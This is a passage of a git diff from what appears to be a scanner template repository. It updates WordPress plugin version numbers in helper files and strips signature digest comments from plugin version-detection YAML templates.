.../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/simple-history.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/sticky-header-effects-for-elementor.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/templately.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../technologies/wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - http/technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - .../wordpress/plugins/woocommerce-legacy-rest-api.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-crontrol.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-logging.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 215 files changed, 16 insertions(+), 215 deletions(-) diff --git a/helpers/wordpress/plugins/advanced-custom-fields.txt b/helpers/wordpress/plugins/advanced-custom-fields.txt index d90094695c..2d660651f2 100644 --- a/helpers/wordpress/plugins/advanced-custom-fields.txt +++ b/helpers/wordpress/plugins/advanced-custom-fields.txt @@ -1 +1 @@ -6.3.6.2 \ No newline at end of file +6.3.6.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index f15ec04e09..5f7049803b 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -4.4.4 \ No newline at end of file +4.4.5 \ No newline at end of file diff --git a/helpers/wordpress/plugins/backwpup.txt b/helpers/wordpress/plugins/backwpup.txt index b673f6ac16..00abb799cc 100644 --- a/helpers/wordpress/plugins/backwpup.txt +++ b/helpers/wordpress/plugins/backwpup.txt @@ -1 +1 @@ -4.1.5 \ No newline at end of file +4.1.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/cookie-law-info.txt b/helpers/wordpress/plugins/cookie-law-info.txt index c4a602db6e..6a3913b049 100644 --- a/helpers/wordpress/plugins/cookie-law-info.txt +++ b/helpers/wordpress/plugins/cookie-law-info.txt @@ -1 +1 @@ -3.2.6 \ No newline at end of file +3.2.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/elementor.txt b/helpers/wordpress/plugins/elementor.txt index 6a160f0238..53e02e22f3 100644 --- a/helpers/wordpress/plugins/elementor.txt +++ b/helpers/wordpress/plugins/elementor.txt @@ -1 +1 @@ -3.24.6 \ No newline at end of file +3.24.7 \ No newline at end of file diff --git a/helpers/wordpress/plugins/forminator.txt b/helpers/wordpress/plugins/forminator.txt index 6fa86837a7..d70132e1de 100644 --- a/helpers/wordpress/plugins/forminator.txt +++ b/helpers/wordpress/plugins/forminator.txt @@ -1 +1 @@ -1.35.1 \ No newline at end of file +1.36.0 \ No newline at end of file diff --git a/helpers/wordpress/plugins/jetpack-boost.txt b/helpers/wordpress/plugins/jetpack-boost.txt index 3c8ff8c36b..80d13b7d9b 100644 --- a/helpers/wordpress/plugins/jetpack-boost.txt +++ b/helpers/wordpress/plugins/jetpack-boost.txt @@ -1 +1 @@ -3.5.1 \ No newline at end of file +3.5.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/mailpoet.txt b/helpers/wordpress/plugins/mailpoet.txt index e230c8396d..7d3cdbf0dd 100644 --- a/helpers/wordpress/plugins/mailpoet.txt +++ b/helpers/wordpress/plugins/mailpoet.txt @@ -1 +1 @@ -5.3.0 \ No newline at end of file +5.3.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/malcare-security.txt b/helpers/wordpress/plugins/malcare-security.txt index 372aa32284..7168732444 100644 --- a/helpers/wordpress/plugins/malcare-security.txt +++ b/helpers/wordpress/plugins/malcare-security.txt @@ -1 +1 @@ -5.77 \ No newline at end of file +5.81 \ No newline at end of file diff --git a/helpers/wordpress/plugins/nextend-facebook-connect.txt b/helpers/wordpress/plugins/nextend-facebook-connect.txt index d96f69cdd5..ac16d4fc61 100644 --- a/helpers/wordpress/plugins/nextend-facebook-connect.txt +++ b/helpers/wordpress/plugins/nextend-facebook-connect.txt @@ -1 +1 @@ -3.1.14 \ No newline at end of file +3.1.15 \ No newline at end of file diff --git a/helpers/wordpress/plugins/optinmonster.txt b/helpers/wordpress/plugins/optinmonster.txt index 720ee3d818..996f28fd16 100644 --- a/helpers/wordpress/plugins/optinmonster.txt +++ b/helpers/wordpress/plugins/optinmonster.txt @@ -1 +1 @@ -2.16.5 \ No newline at end of file +2.16.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 5a2d9b4dd4..261da462f8 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.56 \ No newline at end of file +4.10.57 \ No newline at end of file diff --git a/helpers/wordpress/plugins/smart-slider-3.txt b/helpers/wordpress/plugins/smart-slider-3.txt index 85f498e030..3f34de2ee3 100644 --- a/helpers/wordpress/plugins/smart-slider-3.txt +++ b/helpers/wordpress/plugins/smart-slider-3.txt @@ -1 +1 @@ -3.5.1.23 \ No newline at end of file +3.5.1.24 \ No newline at end of file diff --git a/helpers/wordpress/plugins/tablepress.txt b/helpers/wordpress/plugins/tablepress.txt index 6550da6970..ab6d27898c 100644 --- a/helpers/wordpress/plugins/tablepress.txt +++ b/helpers/wordpress/plugins/tablepress.txt @@ -1 +1 @@ -2.4.3 \ No newline at end of file +2.4.4 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 391e98560b..eafef0d4c5 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.9.2 \ No newline at end of file +2.9.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/wp-google-maps.txt b/helpers/wordpress/plugins/wp-google-maps.txt index cf50489733..217ebbc56c 100644 --- a/helpers/wordpress/plugins/wp-google-maps.txt +++ b/helpers/wordpress/plugins/wp-google-maps.txt @@ -1 +1 @@ -9.0.41 \ No newline at end of file +9.0.42 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ef120d9b7c..3fd2256749 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a378b2edf6bdd469cfc423761b318908f6f1aa06847f064138882e1a1f7682f70220724171d08675bad05e70935e3dff4c814c3f6b85a6e60bc0ce035dbe85e7dbd2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index 6b0b25ab01..6a0d344b63 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f4f4d117256e4ab53118f7924f1a8b5fe9dca15b8ba0658220eaf0a3bd754f47022100cf1b6f1ab980f0f4f46d885bec651c95ad912fe40e4c09926fcd5b4cf9222e0f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 1ce517ff9d..6fb5080bc8 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206da0628df02a408baa03291f607d7668af1c0495db8379d8ce0b9a95bf15880e02210094447ac5963e2a57bbbfd5e54d8d4f7f49d08f547660e52aa0cfe954305d93d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 31086291b5..1f02455962 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a5df7925e8c814313b3ac52eba66a440e40009a42a5bac0bbc4b962668bbf004022100c9565942e02fb7ba5e1872cc072c085fcd57a8a5a71ac1e78c017711c5261c32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/akismet.yaml b/http/technologies/wordpress/plugins/akismet.yaml index 3298ed04a3..6f253f9f55 100644 --- a/http/technologies/wordpress/plugins/akismet.yaml +++ b/http/technologies/wordpress/plugins/akismet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220379d5075c37b8a156aabbe5ec9427c249b5dc7007da39b151a266a1c457c36a402207cd5d6c31f6a308571a75b35ff0e5ff0a2df2ad5390a88ff2389db512b771028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml index 0eaf1deb3f..fe45de4d04 100644 --- a/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee226741ac1cb89c52892d7e0c6bd9cbd5179b5da3c07b27fd68eaf08e6cd6bf02205246cb10a2d1c56c78ad8e051b699e262053dfbc777336308e37487650fd24ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml index 2d6c594646..69e425f446 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100983894aa2d3d94d5b8c615fe37cb65eee8c07065a7bcb4672d1e19bb461e8b9502201cf1d20a4d933009e4a527372808de4d7f66033c72d9f6f27a44d35217f48fc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml index 0c1d1f6fbe..9c07c65e4e 100644 --- a/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml +++ b/http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100daac4e1bed304c29130e0a8e82d8454ceb649abe3438ed7d1e68792ccbcf59e70220591a441d16408bddfa1f78013abfec9a1307b0737bfdf2c612d1953efae39151:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/amp.yaml b/http/technologies/wordpress/plugins/amp.yaml index 43ac6aed9c..92c8f5656e 100644 --- a/http/technologies/wordpress/plugins/amp.yaml +++ b/http/technologies/wordpress/plugins/amp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e846b98742832b5f6068a4ea1cfef3b0a2cfe1e0d9700c81fe8a580f83d5ac600221009c7e5365da616db41599572d8a7e8cf3bfd61da0daf1819970f6c6c9bb08cf97:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/antispam-bee.yaml b/http/technologies/wordpress/plugins/antispam-bee.yaml index 8bb1a15d8f..70975a19a1 100644 --- a/http/technologies/wordpress/plugins/antispam-bee.yaml +++ b/http/technologies/wordpress/plugins/antispam-bee.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022022b8ffad732d12c02175e227332c9c4714bbf677a386865e08406db320a3aeb6022100a6c215e5007a504f5dda334014487a7d51eed3eb4f5995e2651b2f0522767b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index 3fe2b52570..fd7e3e99dd 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202b37b92dba5e8a716f6b64d60f6c474c572054f5dbfdf2bbcf2ba682b447bd9302202d6195f28b6b7498dc523141179ac2ef3d3bbb2c2f5962cfc984d5eb886cc1ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index bb1cd92d52..18f2a2ae84 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008e0145b210c2d7d92fd857078a28030fe8d87b5cc78d8f6020516c95e10a584302200fcdc79eee114d69645c72e2b236f9322c1677b324e112336a9db298ccb914fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index c670821a3f..11cb41fb2c 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203e8f9d71464aa7961f5bb89ce0efe68b9c19059a7edd2b9e65a5f24cfebbcee702210085e87fe23223fadbf4dae3fe76ebec4e6b4a45b0f1a4a60f49227fd3f20e235c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index 8cc06e5897..df3c5f3a94 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100fe6bbbe921be2b2e2e1a14568101ce823094c0f16f5e89eabf390c83b385454b02205e46103d56c106cd8f05b1af4afb6f64c8e8b787ea1ff698cc0f8a6518e34ddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index a4c9b4c246..6a50e049dc 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205900187f6a253d8f3a275ca4dc2c9724f53f2d6f9ab3a2666662f15f96ff22fb022100ec350592545281279d34d72cdcd8572ca13ac599187f20acc396d132062f78c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index ae3e16bf99..e532694167 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022072625e338cc8471cce0e767a7f8c4544e0549b58d245926c152b2b2d5cd12c42022100f7771467cb49de2cabd12f061c510bb0064b8b529bb17ed045fa8e16c8deaf59:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 7f23271f6b..4c6e616c1d 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009788cdc666c44bc859751d5c7a6887c1237bbe4202c699fb4b2f28020426e50f02202c5da233d40a66d6c76143508ecde74fe6985e318dd987d63f80790eaabd8c7a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index 15fa282169..a70a58690c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201c6d05defba3cc85cc96343f6dfbd313e6e50c02e85c5e5dcc49b50403a4dccc02200a6508054d96cc08e5383cb70ff7251083b26d096b0ab118a00cbf97d6b6112d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index ac4191f5f9..f8691caf0a 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202785c3d0e92fea95627022502ce5158b2248307f526c1ff371fad8f4e611d62702204b11237e70554cfda15c52f28b937ac90604d2e30567f647656333043d715077:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index f816e3df32..0cd866179e 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100b11a545cbc266c49a11dd5e24787da4a10bbc9bf6a90c5db570bbc6798835652022100c0c3b736395fb91892b79317bca2f1114007ef8f8f1cb9987c55e0360c4769b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index 321ec67eb3..b1d8479d13 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c6dfe400bcd9848f2c9b264183ad5497c3518d3e285f97d98035b84d45d0de61022100eda0ffc31b29e2e65746b8d346e3c15edb72a9ebaa6f38a070aa307672e3d86b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 17bfd04ac7..04e090313f 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210099bc1bd91df12cf00cc1963ae7ff06351eaa54a94d1685807df92c538e41a1aa022100cb28ebb65beefc034b4f1918b42115d290c9ab1c953cb7f1de4cb7649a1adf52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 8a9c256d1e..57e618924b 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221009605a69af938be48d39fac2f2db55a60998149898d638d6b95e60270b719bc0402202fe88b468651ddb520f797cc819204214d747ff7b5d5c101746d59fd5e931881:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 6673880d69..571b3b20a3 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100ce2496c8011f9d966769c9eca7f14fd6e6dc7b1e4a4f29947ee41e8c5b9a4ca4022100f61ad8039eef7f94528cead425c32d07040fc49f9f6b884ba61e018e7d2bb024:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index a3579f49cc..4d562316b4 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203caf1e2af63be48229642b3633e2b5d5ec4ac8c4dc8a78070ddb915e909de1910220434e00fcaa2615ba17572cb1d7a865d8d09deb2728d805fd16b9c558748565d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index a4114d98b1..dcea952545 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022013d9295be0b33abedf444992ea85d4a6ffe85792e78606f2881770d6b73d9066022100e57e5cef311cae3b67f1657ec6538aa433da46c7a0115fe14a874e848f94f8ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 4d76c698af..0ae2f18122 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e66a2aa391f48986446ca5b5c1575485ef2a696c0109e3dcc03e0c0a71c672d002210082d1dd3f6abc61d96735a456812211d8c350c647879fbb9722917b6133c95424:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 5d885de497..12f549d536 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f24552e180e8752279c673bf3d9a0d1af0274a9ad62664bd2fe3b4d8efb2ed37022100f4689404614d0559252703867cf18215de328130971f47668ba7ecbdc2985f4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index dbb2fdcda6..d8ea6a72f1 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220008ab6ea8c47de439412e244bdc3198f171417b3b84cb79e5a104476a262adb002207eee305920531a83fa8e4fa99892a79652ee57e307865eee719203ba224dd937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index da7be22d4f..e13909fff3 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210095f0ade0e04968f233348a9edb347985d6675278694a491d19fd46b93e04d61f0220736bcda0ec1e6f1e50223c37612cdd4c9463e1ec7131d3fcad0087aee7173c89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index a856b54c0d..88fea67f93 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220382dad1799339ed00069a47b2e08894c13b4a15a6d09da2527501aafffab23fc022100aa9338c7d95a8ed2025d4a1832d4f833c23635e3b62ba619fe64689d05b64d1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index f1db05b09d..d205cdbf36 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220145943f8bbd1083a494f11c23b184cc51f9a3834ef84d6dbb5f0df00538883f602204295fb7db3929b0a67f2c16e8255ace5e9064efc6d381bff75032e9d8215c54c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 1e98d891ca..3fa20df7d2 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ 